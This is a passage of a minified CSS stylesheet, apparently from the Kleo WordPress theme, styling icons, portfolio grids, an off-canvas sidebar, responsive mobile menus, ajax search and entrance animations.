[class^="icon-"].icon-fixed-width.icon-large, [class*=" icon-"].icon-fixed-width.icon-large { width: 1.4285714285714286em; } .icons-ul { margin-left: 2.142857142857143em; list-style-type: none; } .icons-ul > li { position: relative; } .icons-ul .icon-li { position: absolute; left: -2.142857142857143em; width: 2.142857142857143em; text-align: center; line-height: inherit; } [class^="icon-"].hide, [class*=" icon-"].hide { display: none; } .icon-muted { color: #eeeeee; } .icon-light { color: #ffffff; } .icon-dark { color: #333333; } .icon-border { border: solid 1px #eeeeee; padding: .2em .25em .15em; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .icon-2x { font-size: 2em; } .icon-2x.icon-border { border-width: 2px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .icon-3x { font-size: 3em; } .icon-3x.icon-border { border-width: 3px; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; } .icon-4x { font-size: 4em; } .icon-4x.icon-border { border-width: 4px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; } .icon-5x { font-size: 5em; } .icon-5x.icon-border { border-width: 5px; -webkit-border-radius: 7px; -moz-border-radius: 7px; border-radius: 7px; } .pull-right { float: right; } .pull-left { float: left; } [class^="icon-"].pull-left, [class*=" icon-"].pull-left { margin-right: .3em; } [class^="icon-"].pull-right, [class*=" icon-"].pull-right { margin-left: .3em; } /* NO JS */ .no-js ul.nav li.dropdown:hover ul.dropdown-menu { display: block; } .no-js a.menu:after, .no-js .dropdown-toggle:after { content: none; } .no-js .dropdown-submenu > .dropdown-menu { display: none !important; } .no-js .dropdown-submenu:hover > .dropdown-menu { display: block !important; } .no-js .kleo-thumbs-animated a { margin-bottom: 0; } .no-js .kleo-gallery-image span { position: absolute; z-index: 0; visibility: hidden; } .no-js .kleo-gallery-image span:first-child { position: relative; z-index: 1; visibility: visible; } .js-active {} /* ----------------------------------------- 07. Visual Composer Extra class names ----------------------------------------- */ .vc-relative { position: relative; } /* ----------------------------------------- 08. Retina Ready CSS Graphics ----------------------------------------- */ @media only screen and (-webkit-min-device-pixel-ratio: 2), only screen and ( min--moz-device-pixel-ratio: 2), only screen and ( -o-min-device-pixel-ratio: 2/1), only screen and ( min-device-pixel-ratio: 2), only screen and ( min-resolution: 192dpi), only screen and ( min-resolution: 2dppx) { .img-name { background-image: url('../your-image-path/img-name@2x.png'); } } /* ----------------------------------------- Responsive Items ----------------------------------------- */ .responsive-cols { list-style: none; padding: 0; margin-bottom: 0; } .responsive-cols > * { float: left; } .responsive-cols.per-row-6 > * { width: 16.6%; } .responsive-cols.per-row-5 > * { width: 20%; } .responsive-cols.per-row-4 > * { width: 25%; } .responsive-cols.per-row-3 > * { width: 33.333%; } .responsive-cols.per-row-2 > * { width: 49.9%; } @media (min-width: 992px) and (max-width: 1199px) { .responsive-cols > * { width: 33.3% !important; } .responsive-cols.per-row-2 > * { width: 49.9% !important; } } @media (max-width: 991px) { .responsive-cols > * { width: 49.9% !important; } } @media screen and (max-width: 480px) { .responsive-cols > * { width: 100% !important; float: none; } } /* ----------------------------------------- Portfolio ----------------------------------------- */ /* Filter tab-links */ .portfolio-filter-tabs { list-style: none; text-align: center; padding: 20px 0; } .portfolio-filter-tabs li { display: inline-block; padding: 10px 1px; text-transform: uppercase; } .portfolio-filter-tabs li.selected a { border-style: solid; border-width: 1px; } .portfolio-filter-tabs li a { display: inline-block; border-radius: 22px; height: 30px; line-height: 30px; padding: 0 22px; border: 1px solid transparent; } /* Portfolio Items Common Style */ .portfolio-items.default {} .portfolio-items li .portfolio-image img { width: 100%; } /* Portfolio Items Default Style */ .portfolio-items.default-style li .portfolio-item-content { margin: 0 10px 20px; box-shadow: 0 0 1px 0 rgba(0, 0, 0, 0.22); } .portfolio-items.default-style li .portfolio-header .post-title { padding: 10px; } .portfolio-items.default-style li .portfolio-info { padding: 0 10px 10px; } /* Portfolio Items Overlay Style */ .portfolio-items.overlay-style {} .portfolio-items.overlay-style li {} .portfolio-items.overlay-style li .portfolio-item-content {} .portfolio-items.overlay-style li.porto-hosted_video .portfolio-info, .portfolio-items.overlay-style li.porto-video .portfolio-info { display: none; } .portfolio-items.overlay-style li.porto-slider {} .portfolio-items.overlay-style li.porto-thumb {} .portfolio-items.overlay-style li .portfolio-image img {} .portfolio-items.overlay-style li .portfolio-header .post-title, .portfolio-items.overlay-style li .portfolio-info { padding: 10px; position: absolute; -webkit-transform: translate3d(0,50px,0); transform: translate3d(0,50px,0); } .portfolio-items.overlay-style li .portfolio-header .post-title, .portfolio-items.overlay-style li .portfolio-header .post-title a, .portfolio-items.overlay-style li .portfolio-info p { color: #fff !important; } .portfolio-items.overlay-style li .portfolio-info { bottom: 20px; } .portfolio-items.per-row-5.overlay-style li .portfolio-info { bottom: 0; } .portfolio-items.overlay-style li .portfolio-header .post-title { -webkit-transition: -webkit-transform 0.35s; transition: transform 0.35s; width: 50%; top: -40px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; } .portfolio-items.overlay-style li .portfolio-info { opacity: 0; -webkit-transition: opacity 0.2s, -webkit-transform 0.35s; transition: opacity 0.2s, transform 0.35s; } .portfolio-items.overlay-style li:hover .portfolio-info { opacity: 1; } .portfolio-items.overlay-style li:hover .portfolio-header .post-title { transition: all 0.3s ease-in-out 0s; width: 100%; -webkit-transform: translate3d(0,40px,0); transform: translate3d(0,40px,0); } .portfolio-items.overlay-style li:hover .portfolio-image img, .portfolio-items.overlay-style li:hover .portfolio-info { -webkit-transform: translate3d(0,0,0); transform: translate3d(0,0,0); cursor: pointer; } .portfolio-items.overlay-style li:hover .hover-element { background: none repeat scroll 0 0 rgba(0, 0, 0, 0.3); } .portfolio-items.overlay-style li:hover .hover-element i { display: none; } /* Portfolio Items Animated-Title Style */ .portfolio-items.overlay-style.anim-title li .portfolio-header .post-title { opacity: 0; transform: translate3d(-20px,50px,0); } .portfolio-items.overlay-style.anim-title li:hover .portfolio-header .post-title { opacity: 1; -webkit-transform: translate3d(0,50px,0); transform: translate3d(0,50px,0); } /* Hide excerpt */ .portfolio-items.hide-excerpt .portfolio-info { display: none; } .portfolio-items .kleo-video-embed { overflow: hidden; } /*.portfolio-items .mejs-container { max-width: 100%; height: auto !important; }*/ /*.portfolio-items .mejs-mediaelement { position: relative; }*/ .portfolio-items .kleo-video-embed .fluid-width-video-wrapper { height: 100%; } .portfolio-back { padding: 20px 0; } /* Offcanvas Sidebar */ .adminbar-enable .offcanvas-sidebar { top: 32px; } .offcanvas-left.offcanvas-type-default .offcanvas-sidebar, .offcanvas-left.offcanvas-type-overlay .offcanvas-sidebar { -webkit-transform: translate(-240px, 0); transform: translate(-240px, 0); } .offcanvas-left.offcanvas-type-default .offcanvas-sidebar.is-open, .offcanvas-left.offcanvas-type-overlay .offcanvas-sidebar.is-open { -webkit-transform: translate(0, 0); transform: translate(0, 0); } .offcanvas-right.offcanvas-type-default .offcanvas-sidebar, .offcanvas-right.offcanvas-type-overlay .offcanvas-sidebar { -webkit-transform: translate(240px, 0); transform: translate(240px, 0); right: 0; } .offcanvas-right.offcanvas-type-default .offcanvas-sidebar.is-open, .offcanvas-right.offcanvas-type-overlay .offcanvas-sidebar.is-open { -webkit-transform: translate(0, 0); transform: translate(0, 0); } #main, #footer, #socket, .kleo-main-header { /*-webkit-transform: translate(0, 0); transform: translate(0, 0);*/ -webkit-transition: -webkit-transform .3s; transition: transform .3s; } .offcanvas-left.offcanvas-type-default.offcanvas-open #main, .offcanvas-left.offcanvas-type-default.offcanvas-open #footer, .offcanvas-left.offcanvas-type-default.offcanvas-open #socket, .offcanvas-left.offcanvas-type-default.offcanvas-open .kleo-main-header { -webkit-transform: translate(240px, 0); transform: translate(240px, 0); } .offcanvas-right.offcanvas-type-default.offcanvas-open #main, .offcanvas-right.offcanvas-type-default.offcanvas-open #footer, .offcanvas-right.offcanvas-type-default.offcanvas-open #socket, .offcanvas-right.offcanvas-type-default.offcanvas-open .kleo-main-header { -webkit-transform: translate(-240px, 0); transform: translate(-240px, 0); } .offcanvas-right.offcanvas-type-default .kleo-page.offcanvas-open { -webkit-transform: translate(-240px, 0); transform: translate(-240px, 0); } .offcanvas-sidebar { position: fixed; width: 240px; -webkit-transform: translate(-240px, 0); transform: translate(-240px, 0); -webkit-transition: -webkit-transform .3s; transition: transform .3s; top: 0; bottom: 0; font-size: 14px; line-height: 20px; padding: 20px 10px; z-index: 100; overflow:auto; box-sizing:border-box; min-height:100%; height:100%; } .offcanvas-type-default .offcanvas-sidebar {} .offcanvas-type-overlay .offcanvas-sidebar {} .offcanvas-type-overlay .wrap-canvas-menu .widget_nav_menu .offcanvas-menu a {} .offcanvas-type-overlay .wrap-canvas-menu .widget_nav_menu .offcanvas-menu .dropdown-menu { background: transparent; } .widget_nav_menu .offcanvas-menu .sub-menu a:before {} .wrap-canvas-menu .widget_nav_menu .offcanvas-menu a { white-space: normal; } .offcanvas-menu a.btn-buy { background-color: transparent !important; } .offcanvas-type-default .kleo-page {} .offcanvas-type-default .offcanvas-sidebar {} .offcanvas-type-overlay .kleo-page {} .wrap-canvas-menu {} .wrap-canvas-menu .offcanvas-title { height: 30px; } .wrap-canvas-menu .offcanvas-title .open-sidebar:before { -webkit-transition: all 0.5s ease 0s; transition: all 0.5s ease 0s; font-family: "fontello"; font-size: 20px; content: "\e981"; display: block; text-align: center; } .wrap-canvas-menu .offcanvas-title .open-sidebar:hover:before { -webkit-transform: rotate(180deg) !important; transform: rotate(180deg) !important; } .offcanvas-left .wrap-canvas-menu .offcanvas-title .open-sidebar { float: right; } .offcanvas-right .wrap-canvas-menu .offcanvas-title .open-sidebar { float: left; } .wrap-canvas-menu .offcanvas-before { clear: right; } .wrap-canvas-menu .offcanvas-after {} .wrap-canvas-menu .widget_nav_menu .offcanvas-menu { padding: 30px 0; } .wrap-canvas-menu .widget_nav_menu .offcanvas-menu a { text-transform: uppercase; } .wrap-canvas-menu .widget_nav_menu ul ul li a {} .wrap-canvas-menu .widget_nav_menu .offcanvas-menu li.menu-item {} .wrap-canvas-menu .widget_nav_menu .offcanvas-menu li.menu-item a:hover {} .wrap-canvas-menu .widget_nav_menu .offcanvas-menu .dropdown-menu { position: relative; background: transparent; min-width: 100%; } .wrap-canvas-menu .widget_nav_menu .offcanvas-menu .dropdown-menu li { border: none; } .wrap-canvas-menu .widget_nav_menu .offcanvas-menu .dropdown-menu > li > a {} .wrap-canvas-menu .widget_nav_menu .offcanvas-menu .dropdown-menu > li > a:hover, .wrap-canvas-menu .widget_nav_menu .offcanvas-menu .dropdown-menu > li > a:focus { background: none; } .wrap-canvas-menu .kleo-social-icons { list-style: none; padding: 40px 0; text-align: center; } .wrap-canvas-menu .kleo-social-icons li { display: inline-block; padding: 0 10px; } .wrap-canvas-menu .kleo-social-icons li a {} .wrap-canvas-menu .kleo-social-icons li a:hover {} .wrap-canvas-menu .kleo-social-icons li a i { font-size: 18px; } .wrap-canvas-menu .kleo-social-icons .ts-text { display: none; } .wrap-canvas-menu .dropdown-menu > .active > a, .wrap-canvas-menu .dropdown-menu > .active > a:hover, .wrap-canvas-menu .dropdown-menu > .active > a:focus { background: none; } .wrap-canvas-menu .caret:after { top: 9px; } /* Snow */ canvas.letitsnow {position: absolute; top: 0;z-index: 999999; pointer-events: none; left: 0} canvas.letitsnow.pos-fixed {position: fixed;} /* ----------------------------------------- 09. Media Queries ----------------------------------------- */ @media print {} @media (min-width: 768px) { .template-page.col-sm-push-3{ left: -moz-calc(25% - 1px); /* Firefox */ left: -webkit-calc(25% - 1px); /* WebKit */ left: -o-calc(25% - 1px); /* Opera */ left: calc(25% - 1px); /* Standard */ } .template-page.tpl-left.col-sm-push-2{ left: -moz-calc(16.6667% - 1px); /* Firefox */ left: -webkit-calc(16.6667% - 1px); /* WebKit */ left: -o-calc(16.6667% - 1px); /* Opera */ left: calc(16.6667% - 1px); /* Standard */ } .template-page.tpl-left.col-sm-push-4{ left: -moz-calc(33.3333% - 1px); /* Firefox */ left: -webkit-calc(33.3333% - 1px); /* WebKit */ left: -o-calc(33.3333% - 1px); /* Opera */ left: calc(33.3333% - 1px); /* Standard */ } .template-page.tpl-left.col-sm-push-5{ left: -moz-calc(41.6667% - 1px); /* Firefox */ left: -webkit-calc(41.6667% - 1px); /* WebKit */ left: -o-calc(41.6667% - 1px); /* Opera */ left: calc(41.6667% - 1px); /* Standard */ } .template-page.col-sm-push-6{ left: -moz-calc(50% - 1px); /* Firefox */ left: -webkit-calc(50% - 1px); /* WebKit */ left: -o-calc(50% - 1px); /* Opera */ left: calc(50% - 1px); /* Standard */ } .template-page.tpl-3ll.col-sm-push-6{ left: -moz-calc(50% - 2px); /* Firefox */ left: -webkit-calc(50% - 2px); /* WebKit */ left: -o-calc(50% - 2px); /* Opera */ left: calc(50% - 2px); /* Standard */ } .sidebar-3ll.col-sm-4 { right: -moz-calc(33.3334% - 2px); /* Firefox */ right: -webkit-calc(33.3334% - 2px); /* WebKit */ right: -o-calc(33.3334% - 2px); /* Opera */ right: calc(33.3334% - 2px); } .sidebar-3ll.col-sm-2 { right: -moz-calc(66.6667% - 2px); /* Firefox */ right: -webkit-calc(66.6667% - 2px); /* WebKit */ right: -o-calc(66.6667% - 2px); /* Opera */ right: calc(66.6667% - 2px); } .sidebar-extra.sidebar-3ll { margin-left: -1px; } .sidebar-extra.sidebar-3lr { left: -1px; } .sidebar-extra.sidebar-3lr.col-sm-3 { left: -2px; } } @media (min-width: 992px) {} @media (min-width: 1200px) { #productModal .product-info { padding: 20px 30px 0 0; } } @media screen and (max-width: 480px) { .kleo-quick-contact-wrapper { display: none; } /* Buddypress */ #buddypress div.message-search { width: 100%; display: block; } #buddypress li div.item { margin-left: 0; } #buddypress #groups-list .group-inner-list { overflow: auto; } .hr-title.hr-full, .hr-title.hr-long, .hr-title.hr-short { width: 100% !important; } #buddypress div#item-nav .responsive-tabs { height: auto; } #item-nav .tabdrop .dropdown-menu { margin: -11px 0 0 !important; } #buddypress div.activity-comments { margin-left: 0; } .carousel-prev, .carousel-next, .kleo-woo-prev, .kleo-woo-next, .kleo-thumbs-prev, .kleo-thumbs-next { display: none !important; } .logo, .logo a { overflow: hidden; } .logo img { height: auto; } } @media (min-width: 480px) and (max-width: 767px) { } @media screen and (max-width: 400px) { .container { /*min-width: 320px;*/ } .kleo-carousel li article { padding-right: 1px !important; } .kleo-carousel { padding-left: 0 !important; } .navbar-header .logo { float: none; } .kleo-mobile-icons { /*margin-top: -2px !important;*/ } } @media screen and (max-width: 320px) {} @media screen and (max-width: 767px) { .template-page.no-sidebar .wrap-content, .template-page.col-sm-push-3 .wrap-content, .template-page.tpl-3ll .wrap-content, .sidebar-main.sidebar-3rr .inner-content, .sidebar-extra.sidebar-3lr .inner-content, .sidebar-extra.sidebar-3rr .inner-content, .sidebar-extra.sidebar-3ll .inner-content, .template-page.tpl-3lr .wrap-content, .template-page.tpl-3rr .wrap-content, .sidebar-main.sidebar-3lr .inner-content, .sidebar-main.sidebar-3ll .inner-content, .sidebar-main.sidebar-3rr .inner-content, .sidebar-extra.sidebar-3ll .inner-content, .template-page .wrap-content, .sidebar-left .inner-content, .template-page.tpl-right .wrap-content, .sidebar-right .inner-content { padding-left: 0; padding-right: 0; } .template-page, .template-page.tpl-left, .template-page.tpl-3ll, .sidebar-extra.sidebar-3ll, .sidebar-extra.sidebar-3lr, .sidebar-extra.sidebar-3rr, .sidebar-right, .sidebar-main.sidebar-3rr, .sidebar-left, .sidebar-extra.sidebar-3ll, .sidebar-main.sidebar-3ll, .sidebar-main.sidebar-3lr, .sidebar-main.sidebar-3rr { border: 0; } article .article-meta, .single-attachment .entry-header { width: 100%; float: none; text-align: left; margin-bottom: 10px; } .posts-listing.standard-listing.with-meta .article-title, .single .with-meta .article-media, .posts-listing.standard-listing.with-meta .article-media, .single .container .with-meta .article-content, .posts-listing.standard-listing.with-meta .article-content, .single-attachment .entry-content { margin-left: 0; } #image-navigation { padding-left: 0; } .vertical-col .col-sm-1, .vertical-col .col-sm-2, .vertical-col .col-sm-3, .vertical-col .col-sm-4, .vertical-col .col-sm-5, .vertical-col .col-sm-6, .vertical-col .col-sm-7, .vertical-col .col-sm-8, .vertical-col .col-sm-9, .vertical-col .col-sm-10, .vertical-col .col-sm-11, .vertical-col .col-sm-12 { display: block; } .vertical-col .container-full .row:first-child, .vertical-col > .section-container .row:first-child { display: block; width: auto; } } @media (min-width: 768px) and (max-width: 991px) { .logo { text-align: center; } .logo img { margin: 0 auto; } .navbar-header { float: none; } /****************/ .tpl-right article .article-meta, .tpl-left article .article-meta/*, .single-attachment .entry-header*/ { width: 100%; float: none; text-align: left; margin-bottom: 10px; } .tpl-right.posts-listing.standard-listing.with-meta .article-title, .single .tpl-right.with-meta .article-media, .tpl-right.posts-listing.standard-listing.with-meta .article-media, .single .container .tpl-right.with-meta .article-content, .tpl-right.posts-listing.standard-listing.with-meta .article-content, .tpl-left.posts-listing.standard-listing.with-meta .article-title, .single .tpl-left.with-meta .article-media, .tpl-left.posts-listing.standard-listing.with-meta .article-media, .single .container .tpl-left.with-meta .article-content, .tpl-left.posts-listing.standard-listing.with-meta .article-content/*, .single-attachment .entry-content*/ { margin-left: 0; } /*#image-navigation { padding-left: 0; }*/ .tpl-right article .article-meta .entry-date, .tpl-right article .article-meta .post-meta, .tpl-left article .article-meta .entry-date, .tpl-left article .article-meta .post-meta/*, .single-attachment .post-time*/ { width: auto; font-family: inherit; font-size: inherit; } .tpl-right article .article-meta .post-meta .meta-links, .tpl-right article .article-meta .post-meta a.post-time:after, .tpl-right article .article-meta .post-meta .meta-comment-count, .tpl-left article .article-meta .post-meta .meta-links, .tpl-left article .article-meta .post-meta a.post-time:after, .tpl-left article .article-meta .post-meta .meta-comment-count { display: inline; } /****************/ /*bbPress*/ #bbpress-forums form#bbp-search-form { width: 98%; } #bbpress-forums #bbp-search-form input[type=text], #bbpress-forums #bbp-search-form input[type=text] { min-width: inherit; width: 90%; } #bbpress-forums #bbp-search-form input[type=text]:focus, #bbpress-forums #bbp-search-form input[type=text]:focus { min-width: inherit; } } @media (min-width: 992px) and (max-width: 1199px) { .widget form#bbp-search-form input[type=text], .widget_search #searchform input[type=text] { max-width: 110px; } /*bbPress*/ #bbpress-forums form#bbp-search-form { width: 99%; } } @media (min-width: 1440px) { .container { max-width: 1280px; } } .touch-device { display: none; } /* Test Change breakpoint */ @media (max-width: 991px) { .sticky-wrapper { height:auto !important; margin-top: -1px; } .container > .navbar-header, .container > .navbar-collapse { margin-left: 0; margin-right: 0; } .navbar-nav { margin: 0; } .navbar-nav > li > a.btn-buy { padding-left: 12px !important; } .navbar-nav .open .dropdown-menu > li > a { line-height: 20px; } .kleo-main-header, .navbar-transparent .kleo-main-header, .kleo-navbar-fixed.navbar-transparent #header { position: relative !important; top: auto; } .kleo-main-header .navbar-toggle { display: inline-block; margin-right: 0; } .kleo-main-header .navbar-collapse { max-height: inherit; padding: 0; width: 100%; } .kleo-main-header .navbar-collapse > ul > li > a, .header-banner { line-height: normal !important; } .kleo-main-header .logo:not('.logo-retina') img, .kleo-main-header .logo:not('.logo-retina') a { max-height: 100% !important; } .kleo-main-header .navbar-collapse.collapse { display: none !important; } /* Kleo Menu */ #header .navbar-nav { float: none; } #header .navbar-nav li { display: inline-block; width: 100%; border: 1px solid transparent; border-bottom-style: solid; border-bottom-width: 1px; } #header .navbar-nav li a { padding: 10px 0; text-transform: capitalize; } #header .navbar-nav > li > a { font-weight: bold; } #header .navbar-nav li:first-child { /*border-top-color: #f7f7f7;*/ } #header .navbar-nav li:last-child { border-bottom: none; } /*#header .navbar-nav > li > a:before { content: "\2013"; display: block; width: 10px; height: 10px; float: left; margin: 0; }*/ /*#header .navbar-nav .kleo-menu-item-search > a:before { content: " "; }*/ #header .navbar-nav .dropdown-menu { position: relative; background-color: transparent; margin: 0; padding: 0; float: none; width: 100%; box-shadow: none; border: none; z-index: 0 !important; } #header .navbar-nav .dropdown-menu li a { font-weight: normal; font-size: 12px; } #header .navbar-nav .dropdown-menu li > a:before { font-family: "fontello"; content: "\00a0"; display: block; width: 20px; height: 10px; float: left; margin: 0; } #header .navbar-nav .dropdown-submenu .dropdown-menu { left: 0; top: 0; border-bottom: none; margin-bottom: 0; } .kleo-main-header .navbar-nav > li > .dropdown-menu { margin-top:0 !important; } #header .navbar-nav .dropdown-submenu .dropdown-menu li:last-child { border-bottom: none; } #header .navbar-nav .dropdown-submenu .dropdown-menu li a:before { content: "\00a0 \00a0"; width: 30px; } #header .navbar-nav li .caret { float: right; } #header .navbar-nav li .caret:after { font-family: "fontello"; content: "\e982"; font-size: 18px; display: inline-block ; width: 40px; height: 40px; line-height: 40px; text-align: center; right: 0; top: 0; } #header .navbar-nav li.dropdown.open > a .caret:after, #header .navbar-nav li.dropdown-submenu.open > a .caret:after { content: "\e983"; } #header .navbar-nav .dropdown-menu li > a:hover, #header .navbar-nav .dropdown-menu li > a:focus, #header .navbar-nav .dropdown-submenu:hover > a, #header .navbar-nav .dropdown-submenu:focus > a, #header .navbar-nav .dropdown-menu > .active > a { background: none; } .logo-to-right .navbar-header { float: none; } .logo-to-right .kleo-mobile-switch { float: left; } .logo-to-right .kleo-mobile-icons { float: left; } .logo-to-right .navbar-header .logo { float: right; } .header-centered .navbar-header { display: block; } #top-social { border-bottom-style: solid; border-bottom-width: 1px; } #top-social > ul li a, .top-menu > ul li a { border:none; } #top-social .tabdrop:before, .top-menu .tabdrop:before{ border-left: none; } #top-social .tabdrop .dropdown-menu { margin-top: -1px; } /* Menu on Transparent Header */ .kleo-main-header, .navbar-transparent .kleo-main-header, .kleo-navbar-fixed.navbar-transparent #header { position: relative !important; top:auto !important; background-color: #000; } .navbar-transparent #menu-kleonavmenu li { border-bottom-color: rgba(255,255,255, 0.1) !important; } .navbar-transparent #menu-kleonavmenu li:first-child { border-top-color: rgba(255,255,255, 0.1) !important; } .navbar-transparent #menu-kleonavmenu li .caret:after { color: rgba(255,255,255, 0.2) !important; } /* Megamenu */ .kleo-main-header .nav li.kleo-megamenu { position: relative; } #header .navbar-nav li.kleo-megamenu .dropdown-submenu:not(.open) .dropdown-menu { display: none !important; } .kleo-main-header .nav li.kleo-megamenu .dropdown-submenu.open .dropdown-menu { display: block !important; } #header .navbar-nav li.kleo-megamenu .dropdown-submenu > a:after { } #header .navbar-nav li.kleo-megamenu .caret { opacity: 1; display:inline-block; margin-top: -10px; } /* #header .navbar-nav li.kleo-megamenu .dropdown-menu .caret:after { content: "\e979"; } #header .navbar-nav li.kleo-megamenu .dropdown-menu > li > a:hover .caret:after, #header .navbar-nav li.kleo-megamenu .dropdown-menu > li > a:focus .caret:after { content: "\e97a" !important; } */ /* Ajax Cart */ .kleo-mobile-icons { display: inline-block; float: right; margin-top: -4px; } .kleo-toggle-menu, .kleo-toggle-menu .kleo-toggle-submenu { display: none !important; } .kleo-mobile-icons a { color: #fff; margin-right: 20px; font-size: 20px; } .kleo-mobile-icons .cart-items { position: relative; } .kleo-mobile-icons .cart-items span, .kleo-mobile-icons .notify-items span { border-radius: 100%; display: inline-block; font-size: 10px; text-align: center; position: absolute; top: -7px; right: -8px; width: 20px; height: 20px; line-height: 19px; } .navbar-transparent .kleo-mobile-icons a { color: #fff; } /* Ajax Search */ a.search-trigger { display: none !important; } #ajax_search_container:before { display: none; } #ajax_search_container { background-color: transparent; border-radius: 0; border: none; z-index: 9999; position: relative; width:auto; left: inherit; box-shadow: none; top: inherit; line-height: inherit; display: block; padding: 0; } .kleo-ajax-search-loading { right: 20px; top: 27px; } #ajax_searchform { padding: 20px 10px 10px; } a.ajax_view_all { padding: 14px 20px !important; } /* Ajax Search on Transparent Header */ .navbar-transparent input.form-control[type=text] { border-color: rgba(255,255,255, 0.2); } .navbar-transparent input.form-control[type=text]:focus { /*background-color: rgba(255,255,255, 0.1);*/ } .navbar-transparent .kleo_ajax_entry { /*border-bottom: 1px solid rgba(255,255,255, 0.2) !important;*/ } .navbar-transparent .kleo_ajax_entry:hover { /*background-color: rgba(255,255,255, 0.1);*/ } .navbar-transparent #ajax_search_container { /*background-color: transparent !important;*/ } .navbar-transparent #ajax_searchform { background-color: #222; } .navbar-transparent #ajax_searchform .form-control { background-color: transparent; color: #fff; } .kleo-main-header .nav > li > a:hover, .kleo-main-header .nav > li.active > a{ box-shadow: none !important; } section.bg-full-video .mejs-mediaelement {display: none;} section.bg-full-video .mejs-poster {display: block !important;} .post-image img { width: 100%; } article .article-meta .entry-date, article .article-meta .post-meta, .single-attachment .post-time { width: auto; font-family: inherit; font-size: inherit; } article .article-meta .post-meta .meta-links, article .article-meta .post-meta .avatar, article .article-meta .post-meta .meta-author img, article .article-meta .post-meta .meta-author .author-name, article .article-meta .post-meta a.post-time:after, article .article-meta .post-meta .meta-comment-count { display: inline; } article .article-meta .post-meta .meta-author, article .article-meta .post-meta .meta-author img { float: none; } article .article-meta .post-meta .meta-author img { width: 25px; } } /* ----------------------------------------------------- 10. SHORTCODES ----------------------------------------------------- /* -------------------------------------------------- Individual Element Animations - Top to Bottom - Bottom to Top - Left to Right - Right to Left ----------------------------------------------------- */ .kleo-transform .animated.animate-when-visible, .kleo-transform .animated.animate-when-almost-visible, .cul { opacity: 0; } .kleo-transform .animated.start-animation.top-to-bottom, .popover.top, .tooltip.top { -webkit-animation: kleo-ttb 0.8s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); -moz-animation: kleo-ttb 0.8s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); -o-animation: kleo-ttb 0.8s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); animation: kleo-ttb 0.8s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); opacity: 1; } .kleo-transform .animated.start-animation.bottom-to-top, .popover.bottom, .tooltip.bottom { -webkit-animation: kleo-btt 0.8s 1 cubic-bezier(0.165, 0.840, 0.440, 1.000); /* Safari 4+ */ -moz-animation: kleo-btt 0.8s 1 cubic-bezier(0.165, 0.840, 0.440, 1.000); /* Fx 5+ */ -o-animation: kleo-btt 0.8s 1 cubic-bezier(0.165, 0.840, 0.440, 1.000); /* Opera 12+ */ animation: kleo-btt 0.8s 1 cubic-bezier(0.165, 0.840, 0.440, 1.000); /* IE 10+ */ opacity: 1; } .kleo-transform .animated.start-animation.left-to-right, .popover.left, .tooltip.left { -webkit-animation: kleo-ltr 0.8s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* Safari 4+ */ -moz-animation: kleo-ltr 0.8s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* Fx 5+ */ -o-animation: kleo-ltr 0.8s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* Opera 12+ */ animation: kleo-ltr 0.8s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* IE 10+ */ opacity: 1; } .kleo-transform .animated.start-animation.right-to-left, .popover.right, .tooltip.right { -webkit-animation: kleo-rtl 0.8s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* Safari 4+ */ -moz-animation: kleo-rtl 0.8s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* Fx 5+ */ -o-animation: kleo-rtl 0.8s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* Opera 12+ */ animation: kleo-rtl 0.8s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); /* IE 10+ */ opacity: 1; } /* Define Keyframes */ @-webkit-keyframes kleo-ltr { 0% { -webkit-transform:translate(-10%,0); opacity: 0; } 100% { -webkit-transform:translate(0,0); opacity: 1; } } @-moz-keyframes kleo-ltr { 0% { -moz-transform:translate(-10%,0); opacity: 0; } 100% { -moz-transform:translate(0,0); opacity: 1; } } @-o-keyframes kleo-ltr { 0% { -o-transform:translate(-10%,0); opacity: 0; } 100% { -o-transform:translate(0,0); opacity: 1; } } @keyframes kleo-ltr { 0% { transform:translate(-10%,0); opacity: 0; } 100% { transform:translate(0,0); opacity: 1; } } @-webkit-keyframes kleo-rtl { 0% { -webkit-transform:translate(10%,0); opacity: 0; } 100% { -webkit-transform:translate(0,0); opacity: 1; } } @-moz-keyframes kleo-rtl { 0% { -moz-transform:translate(10%,0); opacity: 0; } 100% { -moz-transform:translate(0,0); opacity: 1; } } @-o-keyframes kleo-rtl { 0% { -o-transform:translate(10%,0); opacity: 0; } 100% { -o-transform:translate(0,0); opacity: 1; } } @keyframes kleo-rtl { 0% { transform:translate(10%,0); opacity: 0; } 100% { transform:translate(0,0); opacity: 1; } } @-webkit-keyframes kleo-btt { 0% { -webkit-transform:translate(0,50%); opacity: 0; } 100% { -webkit-transform:translate(0,0); opacity: 1; } } @-moz-keyframes kleo-btt { 0% { -moz-transform:translate(0,50%); opacity: 0; } 100% { -moz-transform:translate(0,0); opacity: 1; } } @-o-keyframes kleo-btt { 0% { -o-transform:translate(0,50%); opacity: 0; } 100% { -o-transform:translate(0,0); opacity: 1; } } @keyframes kleo-btt { 0% { transform:translate(0,50%); opacity: 0; } 100% { transform:translate(0,0); opacity: 1; } } @-webkit-keyframes kleo-ttb { 0% { -webkit-transform:translate(0, -10%); opacity: 0; } 100% { -webkit-transform:translate(0,0); opacity: 1; } } @-moz-keyframes kleo-ttb { 0% { -moz-transform:translate(0, -10%); opacity: 0; } 100% { -moz-transform:translate(0,0); opacity: 1; } } @-o-keyframes kleo-ttb { 0% { -o-transform:translate(0, -10%); opacity: 0; } 100% { -o-transform:translate(0,0); opacity: 1; } } @keyframes kleo-ttb { 0% { transform:translate(0, -10%); opacity: 0; } 100% { transform:translate(0,0); opacity: 1; } } /* -------------------------------------------------- One by one & Individual Element Animations - Appear ----------------------------------------------------- */ .kleo-transform .one-by-one-animated .el-appear, .kleo-transform .multi-columns-row 